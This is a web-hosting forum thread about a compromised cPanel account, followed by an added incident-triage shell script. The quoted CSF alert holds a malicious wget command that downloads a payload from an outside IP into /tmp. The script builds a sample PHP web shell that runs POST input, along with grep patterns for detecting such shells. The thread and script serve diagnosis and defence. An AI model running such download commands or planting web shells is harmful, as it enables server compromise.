suspicious process from client website
Hi guys,
I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious; however, I can't seem to find the culprit file and need some help please.
Time: Wed Oct 26 02:00:21 2016 +1100
Account: c150102a
Resource: Process Time
Exceeded: 3026245 > 1800 (seconds)
Executable: /usr/bin/bash
Command Line: sh -c cd /tmp ; /usr/bin/wget -t0 -c http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766 1> /dev/null 2> /dev/null && echo OK
As per the above alert, your user c150102a was running a command through SSH. You can remove that account from your server; also please check the /tmp directory and remove all unwanted files. If you are not sure about that then please contact your system admin.
I am the system admin. I run the WHM server myself to host client websites. I'm sorry but I do not believe removing the c150102a account is a solution. The account hosts a website for a customer of mine and I cannot simply remove it. I would like to learn how to properly diagnose which file is running the command so I can resolve the issue and know how to deal with it in case I run into something like this again.
I would like to learn
You might want to google that filename, syslib.php for starters.
Well I found the syslib.php file and removed it. I also did a search for any eval(base64_decode(...)) scripts but didn't find any. However, I am still receiving the CSF alerts for something calling a command to that Ukraine IP. Any other suggestions?
Have you checked the account for existing cron jobs? Cron Jobs - Documentation - cPanel Documentation That account shouldn't have access to SSH. It's been compromised and should be removed from the server and a backup from before this came up restored in its place. Without more knowledge of the server and your security, it's hard to say if the entire server has been compromised or not. You really should hire someone for assistance with this if you're unsure of your path forward here. This thread is two days old. Your server's been running a compromised site for at least two days too long.
I double checked. There are no existing cron jobs for any of the users. And this site has been live for months, yet there are no performance issues and nothing else suspicious going on. No other accounts are reporting any bad activities or scripts. In fact, CSF does not report anything else at all apart from that one alert over and over. I have run numerous scanners on the account itself internally and externally and several WordPress plugin scanners and none of them have picked up on anything at all. If all else fails and I can't find the culprit, I will remove the account and rebuild the site. However, I am still keen to know what could be causing this...
Hi guys, so I went through all the accounts I had (47 in total) and found only 3 accounts with Shell access. None of these accounts were the same as the one mentioned above that was giving warnings. However, after fixing this and removing Shell access for these 3 accounts and restarting the server, the warnings have stopped. Not sure what stopped it or what was causing it still, but everything seems fine now and no more security alerts. Also a system wide scan was clean, so I believe the server is fine and there are no more threats or compromised sites.
Hi, are you sure you have mounted /tmp and /dev/shm as noexec and nosuid? If not, please do it asap and remount both partitions. Surely the account mentioned is up to some sort of hack and you need to introspect the account in a detailed manner. Did you check and scan the account in question? Also look for the recently modified files for that account, say the last 90 days, and see if you are getting any clue. Also check the POST requests in the access logs and see if you are seeing any suspicious entries.
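The checks suggested across this thread (POST requests in the account's access log, recently modified PHP files that can spawn a shell, and tracing the alerted PID to its parent) as one added triage script; it is example code, not from any poster, and the docroot/log paths and sample data are constructed placeholders.

```shell
# Added triage helpers for the checks suggested in this thread (POST requests in
# the access log, recently modified PHP files, the parent of the alerted PID).
# Not from any poster; docroot/log paths are placeholders and the sample
# access-log lines and PHP files below are constructed so it runs offline.
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
DOCROOT="$DEMO/public_html"      # placeholder for /home/<account>/public_html
ACCESS_LOG="$DEMO/access_log"    # placeholder for the account's Apache domlog
mkdir -p "$DOCROOT/wp-content/uploads"
# Constructed combined-format log lines: normal traffic plus repeated POSTs from
# one IP to a PHP file living in the uploads directory.
cat > "$ACCESS_LOG" <<'EOF'
203.0.113.5 - - [26/Oct/2016:01:59:10 +1100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Oct/2016:01:59:12 +1100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [26/Oct/2016:02:00:01 +1100] "POST /wp-content/uploads/syslib.php HTTP/1.1" 200 17 "-" "-"
198.51.100.9 - - [26/Oct/2016:02:00:19 +1100] "POST /wp-content/uploads/syslib.php HTTP/1.1" 200 17 "-" "-"
EOF
# Constructed PHP files: one benign, one that hands POST input to a shell.
printf '<?php echo "hello"; ?>\n' > "$DOCROOT/index.php"
printf '<?php $c = $_POST["q"]; shell_exec($c); ?>\n' > "$DOCROOT/wp-content/uploads/syslib.php"

# POSTs to PHP scripts counted per client IP and path. A script receiving POSTs
# from a directory where no PHP should run (uploads/, cache/) is the usual
# web-shell signature; wp-login.php POSTs are expected noise.
suspicious_posts() {
  awk '$6 == "\"POST" && $7 ~ /\.php/ { c[$1 " " $7]++ }
       END { for (k in c) print c[k], k }' "$1" | sort -rn
}

# PHP files modified in the last N days that call functions able to spawn a
# shell or hide code; the eval(base64_decode()) search above is one such case.
suspect_php_files() {
  find "$1" -type f -name '*.php' -mtime -"$2" -exec \
    grep -lE 'eval\(|base64_decode\(|shell_exec\(|system\(|passthru\(|popen\(|proc_open\(' {} +
}

# Live-server step (needs the PID from the CSF alert, so not run on the sample
# data): walk up the parent chain to see whether Apache/PHP-FPM, cron or an
# SSH session spawned the "sh -c cd /tmp ; wget ..." shell.
parent_chain() {
  pid=$1
  while [ -n "$pid" ] && [ "$pid" -gt 1 ]; do
    ps -o pid=,ppid=,user=,comm=,args= -p "$pid"
    pid=$(ps -o ppid= -p "$pid" | tr -d ' ')
  done
}

suspicious_posts "$ACCESS_LOG"
suspect_php_files "$DOCROOT" 90
```

On a real server, point DOCROOT and ACCESS_LOG at the account's public_html and domlog and call parent_chain with the PID from the CSF alert while the process is still running.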